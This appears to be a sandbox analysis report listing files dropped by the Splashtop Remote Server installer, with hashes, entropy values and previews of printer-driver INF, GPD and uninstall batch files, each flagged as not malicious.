                                                                                                                                                                                                                                                                                                                                  SHA-512:635689814E63084910541BA68FE8ADE8FDFBC3D0100AFD61DDD13D07E61F3478BA75E4D24AA7B26DF21A3E46C4ED2B1C8789520C5634CAC63CFE32DCB1E8686E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off....IF [%1] == [] GOTO RunDefault....rundll32 printui.dll,PrintUIEntry /q /dl /n %1..GOTO :EOF....:RunDefault...rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"...GOTO :EOF

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\stprinter.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19851
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.774813122930257
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:UelM68cpgw3otOCxH50u4RkeelMpSfpd/CJHJ2elMSJfApwtNJKGT1hvJNMvIqvQ:EWtO5smIwg9Zh3q8pUclGNbc
                                                                                                                                                                                                                                                                                                                                  MD5:1D56A3F8D7F5DAB184A8CC4FEDDAA173
                                                                                                                                                                                                                                                                                                                                  SHA1:75D291CB96FDC05D54C962F1CB08796EE439B22F
                                                                                                                                                                                                                                                                                                                                  SHA-256:84E1A32B4975E92477CF6A36D8931921DA735EF988E0C09A2B056F2904541B1E
                                                                                                                                                                                                                                                                                                                                  SHA-512:FB58167A98D9309A703F06D5C6414AB707B37E90A26BFC1C0812B10381C116FA6C7C26AC30FC8570B8F87186775BC64E7AF6D409A7D213FC3B4B76B0B7A76FB6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.M...*.H........Mx0.Mt...1.0...`.H.e......0.)...+.....7....).0.).0...+.....7.......m...G..|.O.p...190419044412Z0...+.....7.....0.(.0.... ....z.sXce...j.....Z.j.R...Z.#/.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........x.d.s.m.p.l.u.i...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ....z.sXce...j.....Z.j.R...Z.#/.0.........w...'p....%.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...08..+.....7...1*0(...F.i.l.e........x.d.b.o.o.k...d.l.l...0.... ...v...f..t..t........n.....d.*1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........x.d.w.s.c.r.g.b...i.c.c...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ...v...f..t..t........n.....d.*0.... ..T...x....0.DU._........z.^...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........x.d.p.g.s.c.l...g.p.d...0U..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\stprinter.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2793
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.507689832444162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:JQUio6uDhMM/s4244P8/CW2T8/C0kApvgJCrC1sJCr+6pqEsXncT9tuhcOYEZ53t:JQUiRKhMostT9Ap4sr4ssraXx
                                                                                                                                                                                                                                                                                                                                  MD5:313535621266212971E303AF0AF4FE21
                                                                                                                                                                                                                                                                                                                                  SHA1:D81F9D3F7B638DE5EFCA0ECB0162A76485E2C2BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:0B60A283CB98034CEE13118BF1F885A644479CC6F4B19D9E4D24A5FEC6064A1F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8A1A716A2CAD85410F009EE0CDF570F4CA36E3A182927CA5B836F3FC0BEE466F0C4E8B583694A6A4014CE60C45A2439119BF0C1ADDA0ED168053E9F08A6DF608
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$Windows NT$"..Provider=%splashtop%..ClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}..Class=Printer..DriverVer=04/19/2019,10.0.10012.16386..CatalogFile=stprinter.cat....[Manufacturer]..%splashtop%=Vendor,NTx86,NTamd64,NTx86.6.0,NTamd64.6.0....[Vendor.NTx86]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTamd64]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTx86.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[Vendor.NTamd64.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[INSTALL_XDSMPL_FILTERS_PRE_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..PrintProcessor="MS_XPS,filterpipelineprintproc.dll"..ConfigFile=UniDrvUI.dll..HelpFile=UniDrv.HLP..DataFile=XDSmpl.GPD..Include=NTPRINT.INF, MSXPSDRV.INF..Needs=UNIDRV.OEM, XPSGPD.OEM, XPSDRV.OEM....[INSTALL_XDSMPL_FILTERS_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..Confi

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2561
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.431790187193416
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWoDqFNQ29ZNlV2MK712DJNzaMR1X2kKJzgSZwlQXV2MK71euV2MKo:QFQ4SDC66ZLq7UAq7zq7E
                                                                                                                                                                                                                                                                                                                                  MD5:AD8561D2E73AFD63F5A088972D435467
                                                                                                                                                                                                                                                                                                                                  SHA1:FA7F53A308C00B0C5E1ACE95489658840EAF13A3
                                                                                                                                                                                                                                                                                                                                  SHA-256:68C4AF8BB6C4FB75CFA95739DF4E3B288DBBFB141E6851275E2F9EFFCA893015
                                                                                                                                                                                                                                                                                                                                  SHA-512:AA240EFD0EFD508CE48D444997E65DE8A36DE321764196C294F1366A77C3D30AEA6BF31AF53C7644BD3D027284B266D06D0B574E69598D50D44005718F3F2178
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....\utils\DIFxCmd.exe /u stprinter.inf >> inst.log....\utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows NT x86\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\3\xdbook.dll"..del /F

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2519
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.407961236238507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWSDqFNQ4ZNlV2MK71AynXV2MK71euV2MK7153w3uV:QFQ4SJC64ZLq7xq7zq7Z
                                                                                                                                                                                                                                                                                                                                  MD5:5FD0095B7389DBEDA4EC394C06AC4657
                                                                                                                                                                                                                                                                                                                                  SHA1:7C5D1C3E2B062F6E993AB34292749B03FD7007A8
                                                                                                                                                                                                                                                                                                                                  SHA-256:692FE4C899554BBFA0A05A0183F46C23A24E48FB4371DC0863B7A24452FE5252
                                                                                                                                                                                                                                                                                                                                  SHA-512:F38926653AF960FE11AD843E7C89BB9DC62C29225D2DF10B0CA9BA4F668637BE053778EE726F42A2DC76FA801593A08A69DE4CDEFCB9BE037CA094D34773A8D6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....\utils\DIFxCmd64.exe /u stprinter.inf >> inst.log....\utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\x64\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows x64\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\x64\3\xdbook.dll"..del /F /Q "%W

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdCMYKPrinter.icc

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, CMYK/Lab-prtr device by MSFT, 849080 bytes, 10-5-2006 15:02:14 "Created by Microsoft WCS from DMP: CMYKPrinter.cdmp, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile f"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):849080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.924819797081704
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:nupHTMj2vkdYa+kYfwx+rbgal21W0M5SU1yr2U5fOFQw8LHxrLiYJVarTH46xL1F:upgavkz+UIUBRm020G7
                                                                                                                                                                                                                                                                                                                                  MD5:8EE08E7B69A5F2ECA6BB3A5EEDB48649
                                                                                                                                                                                                                                                                                                                                  SHA1:FF7CFA21BDCB220EC0450E76A1C2AB0854CAEBD6
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B215C1FA5CAA10582BDAFE6B51A911C9D8B2B0B456EEEFF955064FDC3844D98
                                                                                                                                                                                                                                                                                                                                  SHA-512:12AEA33F800D5203811DE1FFA1181BD1B8A58C54BD52A9D2BF7A4084CC2BBC52C9E74E9434C41C6B1EB2CA451E81D5E11B3CE6B827BA4B0F14927EB4FAD62FF0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:....lino. ..prtrCMYKLab ............acspMSFT...................................-MSFT................................................desc........cprt.......1wtpt...,....A2B0...@....B2A0........A2B1...@....A2B2...@....B2A1........B2A2........gamt..^.....MS00...P..gfdesc........Created by Microsoft WCS from DMP: CMYKPrinter.cdmp, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile for photos...enUS....C.r.e.a.t.e.d. .b.y. .M.i.c.r.o.s.o.f.t. .W.C.S. .f.r.o.m. .D.M.P.:. .C.M.Y.K.P.r.i.n.t.e.r...c.d.m.p.,. .C.A.M.P.:. .D.e.f.a.u.l.t. .s.R.G.B. .m.o.n.i.t.o.r.,. .a.n.d. .G.M.M.P.:. .D.e.f.a.u.l.t. .G.a.m.u.t. .M.a.p. .M.o.d.e.l. .P.r.o.f.i.l.e. .f.o.r. .p.h.o.t.o.s...........................................................................text....Copyright (c) 2004 Microsoft Corporation....XYZ .......c........mft2................................................................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdbook.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1808
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.525972600570173
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9QltHlRIORmRCjR73RpRvrmRCgORmRCjR73RpRS:sDuH87FRDRmRCjRrRpRvrmRCbRmRCjRI
                                                                                                                                                                                                                                                                                                                                  MD5:9303837EFF41196B0FC3D6AD46FE43AF
                                                                                                                                                                                                                                                                                                                                  SHA1:9AFBCA730F3A98C5C43AC1AF156BCD6C3CE366E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:ABD2E8A90B9949D61DF21DF88AED7040542555A0228BB0B375439F8488A06294
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F8C9956CEB14B7A275B346A48A1C010DEB23D94BAB4E0FFD395D23B5573533EB80630092CA6A458D33762E55C260752CA294B5E0632179ECC18F17A0B961D55
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdbook.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Booklet specific GPD settings...*%....*%******************************************************************************..*% JobBindAllDocuments..*%******************************************************************************..*Feature: JobBindAllDocuments..{.. *rcNameID: =IDS_GPD_JOBBINDING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: BindLeft.. {.. *rcNameID: =IDS_GPD_LTOR.. }.... *Option: BindRight.. {.. *rcNameID: =IDS_GPD_RTOL.. }.... *Option:

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdcolman.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2718
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.658165462032682
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9xmSx8iZR/+eRxSRURJPRo/8nRFGR7RrXh8TpR9KbzkR5BMLkRWkc4:sDuHN/DRFRkRURJPRo/ARYR7Rrx+R98+
                                                                                                                                                                                                                                                                                                                                  MD5:3F80884F3D1F3B9D5D3C7279131ECB4D
                                                                                                                                                                                                                                                                                                                                  SHA1:17AB016E8AFA453B5A7DA19A6F2AB6AE0B3D78F4
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D09EE22E6A9BFB33E13F5391830FFDA13A572DC6DA1E22D1DEE3D4CAD7BBBD9
                                                                                                                                                                                                                                                                                                                                  SHA-512:363579BDE28329209801FFA7EE0A3A5DD4278886453221768D2F3D7A1ECFE348884004FA08F9B6006E35A6098B72F1738B7B425C9AC8F5F2ACBDC5FD26EEA50A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdcolman.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Color Management specific GPD settings...*%....*%******************************************************************************..*% PageColorManagement..*%******************************************************************************..*Feature: PageColorManagement..{.. *rcNameID: =IDS_GPD_PAGECOLMAN.. *DefaultOption: None.. *PrintSchemaKeywordMap: "PageColorManagement".... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. *PrintSchemaKeywordMap: "None".. }.... *Option: Device.. {.. *rcNameID: =IDS_GPD_D

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdnames.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6871
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6709110049190015
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:sDuHL5cq9ORGELoQ+4JH3U/y5EDeP8N4f6TfSqXYY0s9DOS:3HL5G0Ex+AX0yAePzO0S
                                                                                                                                                                                                                                                                                                                                  MD5:9196C9FAF999C94DA04F4679E823D753
                                                                                                                                                                                                                                                                                                                                  SHA1:BF4445CFF27EC04248BB645C74AAAF6B1EE95B6D
                                                                                                                                                                                                                                                                                                                                  SHA-256:411DFDB99C624831D1E755AD5D861ECE1C2EFCEF23A6C7F89F6C2BA251BBED0A
                                                                                                                                                                                                                                                                                                                                  SHA-512:94A3C1F51B03A91220F9AEF9D8BDDAB6DAD74BE971D5D16B5B308DC5403DE1AFCB3A8D40E0F48CEC1834DE596192BED99C78B03B2538A9594B99347B589650B1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnames.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver GPD resource names...*%....*CodePage: 1252 *% Windows 3.1 US (ANSI) code page....*Feature: RESDLL..{.. *Name: "resource dll files".. *ConcealFromUI?: TRUE.... *Option: UniresDLL.. {.. *Name: "unires.dll".. }.. *Option: xdsmplui.. {.. *Name: "xdsmplui.dll".. }..}....*Macros: StdFeatureNames..{.. IDS_GPD_1PPS: RESDLL.xdsmplui.2000.. IDS_GPD_2PPS: RESDLL.xdsmplui.2001.. IDS_GPD_4PPS: RESDLL.xdsmplui.2002.. IDS_GPD_6PPS: RESDLL.xdsmplui.2003.. IDS_GPD_8PPS:

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdnup.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4068
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.508459493570281
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:sDuHqDYRxRGRDRPRbRERfRSdg9Re9RxjR4RURFRjjRkRSRA1sogRyRGRDRPRbREN:3HqZtgst0P
                                                                                                                                                                                                                                                                                                                                  MD5:CFFD55A27BDF496CABE9C41E80A42A72
                                                                                                                                                                                                                                                                                                                                  SHA1:09225D86A48948152DE3AF346491B893579253CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:D0B69D3877190BFAFCADB90D9D4F6C81DA15CD5E3CBE45BAB4E60BC812FF32C0
                                                                                                                                                                                                                                                                                                                                  SHA-512:D1F0A7C72657897B2394D8C166D4E079CAB6CC3BE35621A8B014F541A1A73245DDD0865C4AE810E1784AC973AEA0419F7DFC42DA42A5B81284B539DC0A24EB29
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnup.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver NUp specific GPD settings...*%....*%******************************************************************************..*% JobNUpAllDocumentsContiguously..*%******************************************************************************..*Feature: JobNUpAllDocumentsContiguously..{.. *rcNameID: =IDS_GPD_JOBNUP.. *DefaultOption: 1.. *PrintSchemaKeywordMap: "JobNUpAllDocumentsContiguously".... *Option: 1.. {.. *rcNameID: =IDS_GPD_1PPS.. }.... *Option: 2.. {.. *rcNameID: =IDS_GPD_2PPS.. }.... *Option: 4.. {..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdpgscl.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2522
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.708364933060842
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9Ydp88+qRIOR3NRXRAR6R5eR7RZboRaYipRazRapjRafRa6RamRaRA:sDuHco4RDR3NRXRAR6R5eR7RZboRaYuY
                                                                                                                                                                                                                                                                                                                                  MD5:F492FC30EFAE3C1548C17D4419E37778
                                                                                                                                                                                                                                                                                                                                  SHA1:887F31639800999D7225AF1EE3F26B601D726401
                                                                                                                                                                                                                                                                                                                                  SHA-256:08FF54CC8DC7E978B8129017307F4455025FC37F891A9EE6CAD37ADA5EB0CEC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F354DBC8B430B168EBAA1BBBAE48DFC6DD285912C1324673BD04AFBDD2947CC3BA8448B440337655377A43A40DC9592CDE26F71A635EEB12746877971C5519D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdpgscl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver page scaling specific GPD settings...*%....*%******************************************************************************..*% PageScaling..*%******************************************************************************..*Feature: PageScaling..{.. *rcNameID: =IDS_GPD_PAGESCALING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Custom.. {.. *rcNameID: =IDS_GPD_CUSTOM.. }.... *Option: CustomSquare.. {.. *rcNameID: =IDS_GPD_CUSTSQUARE.. }.... *Option:

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdsmpl-PipelineConfig.xml

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2476
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.158189280019379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:qDG8kHYKsJyhBk//ojAd+6IG0c9RLN0KUvfaZhcLNhpMubDUHeLNq63PfaZhcLNM:qDhkHtsI4aV46+ZhOb2tZhzZh7jZh/v
                                                                                                                                                                                                                                                                                                                                  MD5:B628B4F8CC199D26E18FE27BD4A29BBD
                                                                                                                                                                                                                                                                                                                                  SHA1:CBB6FB510D708AE85CC0F715617BCD788A613727
                                                                                                                                                                                                                                                                                                                                  SHA-256:12DCC665FDEFEE3D3D771F5727F86FB812C606FCE0E7A3DA943A2072295D2984
                                                                                                                                                                                                                                                                                                                                  SHA-512:825E8583B140C3CA5C44669AAAEF7654A90977F15FD0959FC17DEE30E18C3275EDFE2366A5C90CE707AF28951A56194CBA0CBEE6967CD95FA9CA8CFD6EF189F3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
